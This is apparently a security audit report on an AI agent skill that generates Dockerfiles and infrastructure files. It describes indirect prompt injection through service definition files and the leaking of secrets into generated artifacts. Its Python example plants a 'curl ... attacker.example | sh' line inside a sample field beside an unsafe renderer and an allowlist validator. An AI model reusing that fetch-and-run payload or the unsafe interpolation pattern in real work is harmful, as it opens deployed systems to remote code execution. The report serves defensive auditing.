environment-provisioner

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
  • CREDENTIALS_UNSAFE
  • COMMAND_EXECUTION
  • DATA_EXFILTRATION
Full Analysis
  • Indirect Prompt Injection (HIGH): The skill ingests untrusted data from YAML/JSON service definition files.
    • Ingestion points: the 'input' argument (path to the service definition).
    • Boundary markers: none specified; the agent is expected to interpret the file content directly, so instructions embedded in the file cannot be distinguished from the user's request.
    • Capability inventory: generates Dockerfiles, Terraform and Kubernetes manifests, files intended for execution or deployment.
    • Sanitization: no evidence of sanitization or validation of the input content before it is interpolated into IaC templates.
  • Data Exposure (HIGH): The 'Knowledge Protocol' section explicitly states that the skill integrates the 'Confidential (Company/Client)' and 'Personal' knowledge tiers and prioritizes 'secrets'. The skill is therefore designed to access sensitive context or credentials during generation, and an injected instruction can cause them to be leaked, for example by being written into the generated Dockerfile or manifest.
  • Dynamic Execution (MEDIUM): The skill does not execute code directly in the provided files, but its primary function is generating executable artifacts (Dockerfiles, IaC). If the generation step is compromised, the malicious content is executed downstream when those artifacts are built or applied.
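The injection and sanitization findings above describe a template-interpolation problem. The following example, added here and not part of the audited skill or of Gen Agent Trust Hub's report, shows the vulnerable pattern beside a hardened one: a constructed JSON service definition (the skill also accepts YAML; JSON is used so the example needs no third-party parser) whose 'base_image' field carries a newline and a 'RUN' instruction. The unsafe renderer interpolates fields straight into a Dockerfile template and emits the attacker's instruction as its own line; the hardened renderer validates every field against an allowlist of names, types and character sets first and rejects the file. The field names, the template and the 'ServiceDefinitionError' type are assumptions for illustration, not the skill's real interface.

```python
import json
import re

# Constructed sample (not from the audited skill). The base_image value embeds a
# newline so that the text after it becomes a separate Dockerfile instruction.
UNTRUSTED_SERVICE_DEFINITION = json.dumps({
    "name": "billing-api",
    "base_image": "python:3.12-slim\nRUN curl -s https://attacker.example/x | sh",
    "port": 8080,
})

# Constructed benign definition for comparison.
BENIGN_SERVICE_DEFINITION = json.dumps({
    "name": "billing-api",
    "base_image": "python:3.12-slim",
    "port": 8080,
})

# Hypothetical template of the kind an environment provisioner would use.
DOCKERFILE_TEMPLATE = "FROM {base_image}\nEXPOSE {port}\nLABEL service={name}\n"


def render_unsafe(definition_text: str) -> str:
    """Vulnerable pattern: untrusted fields are interpolated into the template
    with no validation, so any field can inject whole Dockerfile lines."""
    svc = json.loads(definition_text)
    return DOCKERFILE_TEMPLATE.format(**svc)


class ServiceDefinitionError(ValueError):
    """Raised when the service definition fails validation (hypothetical type)."""


# Allowlists: a DNS-label style service name and an OCI image reference
# (repo[:tag][@sha256:digest]). Neither admits whitespace, newlines or shell
# metacharacters, which is what makes line/command injection impossible.
_NAME_RE = re.compile(r"[a-z0-9][a-z0-9-]{0,62}")
_IMAGE_RE = re.compile(
    r"[a-z0-9][a-z0-9._/-]*(:[A-Za-z0-9._-]{1,128})?(@sha256:[0-9a-f]{64})?"
)
_ALLOWED_FIELDS = {"name", "base_image", "port"}


def validate(svc: dict) -> dict:
    """Return a copy of svc containing only validated, allowlisted fields."""
    if not isinstance(svc, dict):
        raise ServiceDefinitionError("service definition must be an object")
    unknown = set(svc) - _ALLOWED_FIELDS
    if unknown:
        raise ServiceDefinitionError(f"unexpected fields: {sorted(unknown)}")
    name = svc.get("name")
    if not isinstance(name, str) or not _NAME_RE.fullmatch(name):
        raise ServiceDefinitionError("invalid service name")
    image = svc.get("base_image")
    # fullmatch requires the whole value to match, so a trailing "\nRUN ..."
    # fails even though the prefix is a valid image reference.
    if not isinstance(image, str) or not _IMAGE_RE.fullmatch(image):
        raise ServiceDefinitionError("invalid base image reference")
    port = svc.get("port")
    if not isinstance(port, int) or isinstance(port, bool) or not 1 <= port <= 65535:
        raise ServiceDefinitionError("invalid port")
    return {"name": name, "base_image": image, "port": port}


def render_safe(definition_text: str) -> str:
    """Hardened pattern: validate before interpolating."""
    svc = validate(json.loads(definition_text))
    return DOCKERFILE_TEMPLATE.format(**svc)


def rejection_reason(definition_text: str):
    """Return the validation error message, or None if the file is accepted."""
    try:
        render_safe(definition_text)
    except ServiceDefinitionError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    print("--- unsafe render of injected definition ---")
    print(render_unsafe(UNTRUSTED_SERVICE_DEFINITION))
    print("--- safe render: injected definition ---")
    print(rejection_reason(UNTRUSTED_SERVICE_DEFINITION))
    print("--- safe render: benign definition ---")
    print(render_safe(BENIGN_SERVICE_DEFINITION))
```

The same allowlist approach applies to the Terraform and Kubernetes outputs the skill produces; the key property is that every value reaching a template has a syntax defined by the generator, not by the file's author, and that the file's prose (comments, descriptions, free-text fields) is never handed to the model as instructions.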
Recommendations
  • AI detected serious security threats. Following from the findings above:
  • Treat the service definition file as untrusted input. Validate it against a strict schema (allowlisted fields, types and character sets) and reject anything unexpected before any value is interpolated into a Dockerfile, Terraform or Kubernetes template; never pass free-text fields from the file to the agent as instructions.
  • Do not grant the skill access to the 'Confidential (Company/Client)' or 'Personal' knowledge tiers or to stored secrets during generation; supply credentials at deploy time from a secret store rather than baking them into generated artifacts.
  • Review generated artifacts before they are built or applied, and build or apply them first in a sandbox or non-production environment.
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 16, 2026, 12:48 PM